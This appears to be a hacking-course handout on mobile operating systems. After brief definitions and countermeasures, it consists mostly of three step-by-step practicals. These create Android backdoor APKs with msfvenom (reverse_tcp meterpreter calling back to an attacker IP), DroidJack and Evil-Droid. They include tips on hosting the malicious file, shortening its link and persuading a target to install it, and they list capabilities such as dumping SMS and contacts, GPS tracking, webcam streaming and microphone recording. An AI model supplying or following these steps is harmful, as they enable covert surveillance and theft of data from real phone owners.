Mobile operating system

A mobile operating system is an OS that is specifically designed to run on

mobile devices such as mobile phones, smartphones, PDAs, tablet computers and
other handheld devices. Mobile operating systems combine features of a personal
computer operating system with other features useful for mobile or handheld use

List of Mobile OS
1. Android OS 5. Palm OS
2. Bada 6. Symbian OS
3. BlackBerry OS 7. webOS
4. iPhone OS / iOS 8. Windows Mobile

Terms in Mobile Hacking

Stock ROM: It is the default ROM (operating system) of an Android Device.

Rooting: Rooting is the process of allowing users of smartphones, tablets and other
devices running the Android mobile operating system to attain privileged control
(known as root access) over various Android subsystems.

Lineage OS: LineageOS is a free and open-source operating system for

smartphones and tablet computers, based on the Android mobile platform. It is the
successor to the custom ROM Cyanogen Mod

Bricking Mobile: A device that does not turn on and function normally. The
bricked device cannot be fixed through normal procedures. Devices are bricked
due to overwriting of the Firmware or low-level system software.

Bring Your Own Device (BYOD): Bring your own device (BYOD) is a business
policy that allows employees to bring their mobile devices to their workplace.

Mobile Platform Vulnerabilities and Risks

● Malicious Apps in Store
● Mobile Malware
● Jailbreaking or Rooting
● Mobile Application Vulnerabilities
● Weak Data Security and App Encryption
● Excessive Permissions
● Weak Communication Security

www.hackerschool.in
Android OS
Android is a mobile operating system developed by Google, based on a
modified version of the Linux kernel and other open source software and designed
primarily for touchscreen mobile devices such as smartphones and tablets.

Android Architecture
Android Architecture is implemented in the form of a software stack
architecture consisting of a Linux kernel, a runtime environment and
corresponding libraries, an application framework and a set of applications.

iPhone OS (IOS)
iOS is a mobile operating system created and developed by Apple Inc. and
distributed exclusively for Apple hardware. It is a proprietary operating system
which runs on Apple mobile devices (iPhone, iPad, and iPod touch).

iOS Architecture
The architecture of iOS is a layered architecture. At the uppermost level iOS
works as an intermediary between the underlying hardware and the applications

www.hackerschool.in
running on the device. Apps communicate with the hardware through a collection
of well-defined system interfaces instead of directly interacting with hardware.
Interfaces make it simple to write apps that constantly work on devices
having various hardware abilities.

Hacking Android Device

● Hacking Android By using Malicious App Infection
○ Dendroid
○ Droid Jack
○ AndroRAT
● Using Kernel Level Vulnerabilities to Exploit Mobile Devices
○ Stage Fright

General Guidelines for Mobile Security

● Do not load too many applications and avoid auto-upload of photos to social
networks.
● Securely wipe or delete the data disposing of the device.
● Turn of Bluetooth if it is not necessary.
● Do not share the information within GPS-enabled apps unless they are
necessary.
● Install applications from trusted application stores.

www.hackerschool.in
Countermeasures
● Do not directly download Android Package Files from untrusted websites.
● Never root your Android device.
● Update the operating system regularly.
● Use iOS devices on a secured and protected WiFi network.
● Deploy only trusted third-party applications on iOS devices.
● Configure ‘Find My iPhone’ and utilize it to wipe a lost or stolen device.
● In the case of IT companies, it is important to educate employees in the
organization about the BYOD policy.

References
1. Rooting (Android). (2018, July 27). Retrieved from
https://en.wikipedia.org/wiki/Rooting_(Android)
2. LineageOS. (2018, August 05). Retrieved from
https://en.wikipedia.org/wiki/LineageOS

www.hackerschool.in
 INDEX
S. No. Practical Name Page No.
1 Mobile Hacking using Metasploit Framework 1
2 Hacking Android OS using Droid jack 11
3 Hacking Android OS using Evil-Droid 21

THIS DOCUMENT INCLUDES ADDITIONAL PRCTICALS WHICH MAY OR MAY NOT BE COVERED DURING
CLASSROOM TRAINING. FOR MORE DETAILS APPROACH LAB COORDINATORS
 Practical 1: Mobile Hacking using Metasploit Framework.
Description: in this practical you will learn how to create an android malicious app
using msfvenom tool and how to use that to grab target sensitive information once the
target executes the app that we share with him.

Step 1: Create Android malware using msfvenom. Execute the following command to
create a malware that can run on Android OS and act as a backdoor.
● msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP>
LPORT=<attacker PORT> R > filename.apk

Step 2: To enable targets to download this malware, start apache server by executing
below command

Step 3: Load Metasploit Framework to start malware listener.

● Command: service postgresql start

● Command: msfconsole

1|Page
www.hackerschool.in
Step 4: Let us use multi/handler exploit to handle reverse connections.

Step 5: Make sure to use the same payload that was used during malware creation and
configure payload options.

Step 6: Execute exploit command, which starts handler.

● Trick the target to download and execute a malicious file.

● If the victim downloads and installs the malicious application (Sampleapp.apk),
then the attacker can gain a meterpreter session.

2|Page
www.hackerschool.in
Step 7: Android meterpreter contains different commands than windows and Linux. We
can enter “?” if you like to see the options.

● Checking Root

● Accessing Files and Directories

3|Page
www.hackerschool.in
 ● Dumping SMS

4|Page
www.hackerschool.in
 ● Downloading and uploading files

5|Page
www.hackerschool.in
 ● File Modification

6|Page
www.hackerschool.in
● GPS Tracking

● Sending SMS

● Webcam live streaming

7|Page
www.hackerschool.in
 ● Capturing photos using a webcam

8|Page
www.hackerschool.in
 ● Recording MIC conversations

● Dumping Contact

9|Page
www.hackerschool.in
 10 | P a g e
www.hackerschool.in
 Practical 2: Hacking Android OS using Droid jack
Description: In this practical you will learn how to do the activities that we did on
previous practical but using another tool called a Droid jack. This tool comes with some
advanced controlling features.
Note:
1. Disable Malware defenses (AV programs) and Firewall before proceeding
with this practical.
2. Droid jack is a Java-based application that requires the latest JRE. Install
java runtime environment (JRE) to run Droid jack application.

Step 1: Extract Droid jack archive. Double click on that executable (Droidjack.jar) to
launch the Droid jack.

11 | P a g e
www.hackerschool.in
Step 2: Under Generate APK tab, enter necessary details (attacker’s IP address, port
number) and click on Generate button to create APK file.

Step 3: APK file will be saved in the Droid jack folder.

12 | P a g e
www.hackerschool.in
Step 4: Under Devices, enter Port number (assigned while APK creation) and click on
Off button, which turns ON for listening to new connections.

13 | P a g e
www.hackerschool.in
Step 5: Visit https://send.firefox.com and upload the tezz.apk file saved in the Droid
jack folder.

Step 6: This website generates a link from where anyone can download the malicious
APK file over the internet.

● we can even shorten the link created by send.firefox.com using any online URL
shortening services (http://tinyurl.com)
● Convince your target to download and install tezz.apk.
14 | P a g e
www.hackerschool.in
Step 7: If the target installs downloaded malicious APK file, the attacker can observe a
new connection under Devices tab on Droid jack application wizard.

Step 8: An attacker can control the target mobile and perform several operations
remotely.

15 | P a g e
www.hackerschool.in
 16 | P a g e
www.hackerschool.in
 17 | P a g e
www.hackerschool.in
 18 | P a g e
www.hackerschool.in
 19 | P a g e
www.hackerschool.in
Victim’s mobile screen:

20 | P a g e
www.hackerschool.in
 Practical 3: Hacking Android OS using Evil-Droid
Description: In this practical we will learn how to bind original android application file
(apk) with the malicious payload and create an android malware, using Evil-droid tool.
Prerequisites: openjdk-14-jdk-headless should be installed.

Step 1:
● Evil-droid is a framework that creates an apk payload and embed it into the
original android application and helps to penetrate the android mobiles. This tool
is available in GitHub and to clone this tool simply execute the below step in the
terminal window.
● Command: git clone https://github.com/M4sc3r4n0/Evil-Droid.git

Step 2: It will create an Evil-Droid directory, navigate into it and list out the files.

Step 3: Give executable permissions to Evil-Droid files.

● Command: chmod +x <file name>

Step 4: Execute the evil-droid,

21 | P a g e
www.hackerschool.in
Step 5: Starting it will check for dependencies, if not found any it will download the
required tools for it to work properly. Here it is installing Apktool. Then it asks
permission to start framework and service, click on yes.

22 | P a g e
www.hackerschool.in
Step 6: After loading of Evil-Droid framework, it shows the available options. Select
3rd option

23 | P a g e
www.hackerschool.in
Step 7: Enter the ip address, by default it takes your private IP (give the public IP in
case if we performing WAN level attack),

Step 8: provide port number to establish connection.

Step 9: Provide the application name (any name) without extension.

Step 10: Now it will show list of payload options choose any payload option
(meterpreter will gives more control over device),

24 | P a g e
www.hackerschool.in
Step 11: It will ask for the original apk file to bind the evil droid app (download any
Android apk from online, some of the 3rd party apps may give errors and better choose a
small size apk), select the file.

25 | P a g e
www.hackerschool.in
 ● After selection of the file, it will start to decompile the apk and embed the
selected payload into the apk file and create a malicious apk file.
Note:
Case 1: If we get the below error message like “Debug key not found. Generating
new” as shown below, provide any random details there.

26 | P a g e
www.hackerschool.in
Case 2: If we get error message like “failed to verify signed artifacts”, download
apktool-*.jar from https://bitbucket.org/iBotPeaches/apktool/downloads/. Rename
the apktool-*.jar to apktool.jar and copy that file to “Evil-Droid path/tools/”
directory. Run the tool again.

27 | P a g e
www.hackerschool.in
Step 12: After selection of the APK file, then it decompiles the original apk and embed
our payload into the apk file and create a malicious apk file and save it to the evil apk
directory in Evil-Droid location if everything works fine.

Step 13: After creation of malware apk. It will ask for a selection of handlers, select
multi-handler and click ok.

28 | P a g e
www.hackerschool.in
Step 14: After selection of handler options, it will automatically start multi-handler.
Share that file with the target and if target executes the file, we will get a connection in
the handler.

29 | P a g e
www.hackerschool.in
 30 | P a g e
www.hackerschool.in